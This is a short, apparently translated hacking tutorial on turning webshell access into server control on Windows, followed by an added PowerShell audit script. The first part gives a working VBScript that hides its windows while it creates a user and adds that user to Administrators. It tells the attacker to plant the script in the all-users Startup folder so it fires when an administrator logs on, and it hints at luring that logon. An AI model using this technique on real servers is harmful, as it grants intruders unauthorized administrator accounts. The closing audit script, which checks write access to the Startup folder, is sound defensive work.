When we have a webshell on a website and want to go further and obtain permissions on the server itself, we can look at which directories on the server's system disk are readable and writable. If the directory C:\Documents and Settings\All Users\Start Menu\Programs\Startup on the server is readable and writable, we can upload a vbs or bat script there to elevate permissions. Here I will explain in detail how to use a vbs script to escalate permissions and add a user.

1. First, write the vbs script that adds a user and password. You can modify the user password as follows.

' The second argument 0 runs each command with a hidden window
Set wshshell = CreateObject("wscript.shell")
a = wshshell.run("cmd.exe /c net user username /add", 0)
b = wshshell.run("cmd.exe /c net localgroup Administrators username /add", 0)

After changing the account password, copy the above code and save it under any file name with the .vbs extension.

2. Upload the saved vbs script to C:\Documents and Settings\All Users\Start Menu\Programs\Startup. That completes the privilege-escalation step: the account and password are added automatically the next time someone logs on to the target server.

PS: A patient friend can use this method to attempt privilege escalation. Of course, our goal is to get the Administrator to log on to the server. As for how to do that, you can work it out yourself.
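The condition described above (a Startup folder for all users that a low-privileged account can write to) can be checked on a server. The following PowerShell is an added example, not part of the original article: it lists accounts outside a trusted baseline that hold write access to the all-users Startup folder, and the launchable files already in it. It assumes PowerShell 3.0 or later run from an elevated prompt; the trusted SID list and the extension list are assumptions to adjust to local policy.

```powershell
# Added example: audit the all-users Startup folder (run elevated, PowerShell 3.0+).
$startup = [Environment]::GetFolderPath('CommonStartup')

# Assumed baseline of principals allowed to write here; adjust to local policy.
$trusted = @(
    'S-1-5-18',      # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',  # BUILTIN\Administrators
    'S-1-3-0',       # CREATOR OWNER
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # TrustedInstaller
)

# Bits that allow dropping or changing a file in the folder:
# 0x2 CreateFiles/WriteData, 0x4 AppendData, 0x40000000 GENERIC_WRITE, 0x10000000 GENERIC_ALL.
# Modify and FullControl contain 0x2, so they match as well.
$writeMask = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000

$sidType  = [System.Security.Principal.SecurityIdentifier]
$acl      = Get-Acl -LiteralPath $startup
$findings = foreach ($rule in $acl.GetAccessRules($true, $true, $sidType)) {
    if ($rule.AccessControlType -ne 'Allow') { continue }
    if (-not ([int]$rule.FileSystemRights -band $writeMask)) { continue }
    $sid = $rule.IdentityReference.Value
    if ($trusted -contains $sid) { continue }
    try   { $name = $rule.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $name = '(unresolved)' }
    [pscustomobject]@{
        Account   = $name
        Sid       = $sid
        Rights    = $rule.FileSystemRights
        Inherited = $rule.IsInherited
    }
}

# Files in the folder that run at logon (assumed extension list).
$extensions = '.vbs', '.vbe', '.js', '.jse', '.wsf', '.bat', '.cmd', '.ps1', '.exe', '.lnk'
$files = Get-ChildItem -LiteralPath $startup -File -Force |
    Where-Object { $extensions -contains $_.Extension.ToLower() } |
    Select-Object Name, CreationTime, LastWriteTime,
        @{ Name = 'Owner'; Expression = { (Get-Acl -LiteralPath $_.FullName).Owner } }

"Startup folder: $startup"
if ($findings) { 'Unexpected write access:'; $findings | Format-Table -AutoSize }
else           { 'No write access outside the trusted baseline.' }
if ($files)    { 'Launchable files present (review each):'; $files | Format-Table -AutoSize }
else           { 'No script or executable files present.' }
```

Any account reported under "Unexpected write access", in particular the identity the web application runs as, should have that access removed, and any file listed should be traced to a known installer or administrator.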